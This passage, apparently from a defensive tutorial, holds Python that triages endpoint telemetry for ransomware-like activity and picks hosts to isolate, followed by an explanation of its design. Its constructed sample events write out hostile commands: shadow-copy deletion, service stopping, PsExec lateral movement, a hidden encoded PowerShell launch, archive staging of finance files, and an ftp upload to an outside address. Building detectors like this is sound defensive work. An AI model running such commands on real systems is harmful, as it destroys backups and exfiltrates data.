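    outbound transfer tool runs on the same host within EXFIL_WINDOW_SECONDS."""
    privileged = {u.lower() for u in privileged_users}
    findings, staging_ts = [], {}          # staging_ts: host -> first staging time
    for ev in sorted(events, key=lambda e: e["ts"]):
        text = (ev.get("image", "") + " " + ev.get("cmdline", "")).lower()
        user = ev.get("user", "").lower()
        hits = [(name, sev) for name, sev, pat in COMMAND_RULES if pat.search(text)]
        if UI_LANGUAGE_API in (api.lower() for api in ev.get("imports", [])):
            hits.append(("ui_language_probe", "medium"))
        for name, severity in hits:
            if user in privileged:
                severity = escalate(severity)
            findings.append({"ts": ev["ts"], "host": ev["host"], "user": ev.get("user", ""),
                             "rule": name, "severity": severity, "cmdline": ev.get("cmdline", "")})
            if name == "archive_staging":
                staging_ts.setdefault(ev["host"], ev["ts"])
            elif (name == "outbound_transfer_tool" and ev["host"] in staging_ts
                  and ev["ts"] - staging_ts[ev["host"]] <= EXFIL_WINDOW_SECONDS):
                findings.append({"ts": ev["ts"], "host": ev["host"], "user": ev.get("user", ""),
                                 "rule": "collection_then_exfiltration", "severity": "high",
                                 "cmdline": ev.get("cmdline", "")})
    return findings


def hosts_to_isolate(findings, min_severity="high"):
    """Sorted hosts with at least one finding at or above min_severity."""
    floor = SEVERITY_RANK[min_severity]
    return sorted({f["host"] for f in findings if SEVERITY_RANK[f["severity"]] >= floor})


# Constructed sample telemetry (ts = seconds; the last event is benign admin use).
SAMPLE_EVENTS = [
    {"ts": 1000, "host": "fs01", "user": "CORP\\svc_backup", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": 1010, "host": "db01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net stop MSSQLSERVER /y"},
    {"ts": 1020, "host": "ws07", "user": "CORP\\da_mike", "image": r"C:\Tools\PsExec64.exe",
     "cmdline": r"PsExec64.exe \\db01 -s -d cmd.exe /c whoami"},
    {"ts": 1030, "host": "ws07", "user": "CORP\\da_mike", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A..."},
    {"ts": 1100, "host": "fs01", "user": "CORP\\svc_backup", "image": r"C:\Tools\7z.exe",
     "cmdline": r"7z.exe a -p -mhe=on D:\staging\finance.7z \\fs01\finance\*"},
    {"ts": 1300, "host": "fs01", "user": "CORP\\svc_backup", "image": r"C:\Windows\System32\ftp.exe",
     "cmdline": r"ftp.exe -s:C:\Users\Public\up.txt 203.0.113.50"},
    {"ts": 1400, "host": "ws07", "user": "CORP\\da_mike", "image": r"C:\Users\Public\update.exe",
     "cmdline": "update.exe", "imports": ["GetUserDefaultUILanguage", "CryptEncrypt", "FindFirstFileW"]},
    {"ts": 1500, "host": "ws02", "user": "CORP\\alice", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]
PRIVILEGED_USERS = ["CORP\\da_mike", "CORP\\da_admin"]   # constructed Domain Admins list

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS, PRIVILEGED_USERS):
        print(f"{f['severity']:6} {f['host']:5} {f['rule']:30} {f['cmdline'][:50]}")
    print("isolate first:", hosts_to_isolate(triage(SAMPLE_EVENTS, PRIVILEGED_USERS)))
```

Running the block on the constructed events yields eight findings, and `hosts_to_isolate` returns the three hosts a responder would segment off first; the benign PowerShell run on `ws02` produces nothing, because the encoded-command pattern does not match `-ExecutionPolicy`. Two design choices follow the talk directly: any finding under a domain admin account is bumped one severity level (the "privileged use" point), and staging plus an outbound transfer tool on the same host within the window is reported as a single high-severity collection-then-exfiltration event rather than two low ones. The `imports` field stands in for whatever static-scan output an EDR exposes; the name is an assumption.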